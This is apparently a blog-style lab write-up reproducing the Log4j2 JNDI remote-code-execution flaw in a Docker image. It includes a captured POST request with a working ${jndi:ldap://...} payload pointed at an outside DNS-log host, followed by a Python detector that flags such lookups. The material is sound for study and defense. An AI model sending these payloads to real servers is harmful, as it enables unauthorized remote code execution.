Vulnerability Overview
Apache Log4j2 is a Java logging framework and the successor to Log4j. It lets you control the output format of every log entry and, by assigning a level to each log message, control the logging process in fine detail. The vulnerability exists because certain Log4j2 features recursively resolve lookups inside logged strings; an attacker can exploit this without authorization by supplying crafted data, achieving remote code execution and ultimately obtaining the highest privileges on the server.
Currently affected Apache Log4j2 versions:
2.0 ≤ Apache Log4j2 ≤ 2.14.1
Vulnerability Reproduction
Before pulling the image to reproduce this, make sure the virtual machine is not in a suspended state!
Thanks to Fengxuan (风炫) for patiently answering my questions.
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
Using default tag: latest
latest: Pulling from fengxuan/log4j_vuln
Digest: sha256:d929cad3243483f2f3cec6b7281a02873d9e6661dc00b5f0313429c04912d71d
Status: Image is up to date for registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest
registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest

┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
8b707e3bc843cc4adc64b97a7237bf887ff6b31d5156d66a930b6b8861138a9b

┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker exec -it log4j_vuln_container /bin/bash
[root@8b707e3bc843 ansible]# /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
Using CATALINA_BASE:   /home/apache-tomcat-8.5.45
Using CATALINA_HOME:   /home/apache-tomcat-8.5.45
Using CATALINA_TMPDIR: /home/apache-tomcat-8.5.45/temp
Using JRE_HOME:        /usr/local/jdk1.8.0_144/
Using CLASSPATH:       /home/apache-tomcat-8.5.45/bin/bootstrap.jar:/home/apache-tomcat-8.5.45/bin/tomcat-juli.jar
Tomcat started.
[root@8b707e3bc843 ansible]#
http://127.0.0.1:8080/webstudy/hello-fengxuan
Change the default proxy ports in Burp and SwitchyOmega.
POST /webstudy/hello-fengxuan HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; private_content_version=e48e945c4e066c5afa30b51edd7c4541; pma_lang=en; pma_collation_connection=utf8_unicode_ci
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

c=${jndi:ldap://bb772939.dns.1433.eu.org}
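The request above carries the lookup string in a POST parameter, but Log4j2 resolves lookups in any string that reaches a log call, so a defender's first detection step is to inspect every request field a client controls, not just the body. The following is an added example, not part of the original post or of the vulnerable image described above: it parses a raw HTTP/1.1 request, collects the request line, header values and form fields, collapses Log4j's nested lookup syntax (${lower:...}, ${upper:...} and ${name:-default}) the way Log4j's own resolver would before reaching the jndi lookup, and reports every field that still contains a ${jndi:...} lookup afterwards. The sample request and the callback.example host are constructed placeholders, and the function names are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample request modelled on the captured request above.
# The callback host is a placeholder, not a real endpoint.
SAMPLE_BODY = "c=${jndi:ldap://callback.example/a}"
SAMPLE_REQUEST = (
    "POST /webstudy/hello-fengxuan HTTP/1.1\r\n"
    "Host: 127.0.0.1:8080\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(SAMPLE_BODY)}\r\n"
    "\r\n" + SAMPLE_BODY
)

# An innermost ${...} lookup: no nested "${" and no "}" inside the braces.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately want to find once nesting has been collapsed.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Evaluate the lookup forms that only change case or supply a default,
    which Log4j's resolver applies before the jndi lookup runs. The jndi
    lookup itself and anything unknown are left untouched."""
    if inner.lower().startswith("jndi:"):
        return "${" + inner + "}"
    if inner.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if inner.startswith("upper:"):
        return inner[len("upper:"):].upper()
    if ":-" in inner:
        # "${name:-default}" yields the default whenever the name is unset,
        # which is the usual case for an arbitrary name.
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out until the text stops
    changing, so the detector sees what Log4j would see."""
    for _ in range(max_rounds):
        new = LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def scan_request(raw: str):
    """Return (location, normalized value) for every request field that
    still carries a ${jndi:...} lookup after normalization."""
    request_line, headers, body = parse_request(raw)
    fields = [("request-line", unquote(request_line))]
    fields += [("header:" + name, value) for name, value in headers.items()]
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        for name, values in parse_qs(body, keep_blank_values=True).items():
            fields += [("form:" + name, v) for v in values]
    else:
        fields.append(("body", unquote(body)))
    hits = []
    for location, value in fields:
        norm = normalize(value)
        if JNDI.search(norm):
            hits.append((location, norm))
    return hits


if __name__ == "__main__":
    for location, value in scan_request(SAMPLE_REQUEST):
        print(f"JNDI lookup in {location}: {value}")
```

scan_request can be fed requests captured by a proxy or by an access log that records full request bodies; the headers are scanned because User-Agent and similar values are commonly logged as-is. It is a detection aid for the affected version range listed above, not a substitute for upgrading Log4j2 out of that range.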
Everything is affected
1. Voice assistants
2. Phone home screens
3. A certain Bluetooth device
4. A certain car
And then…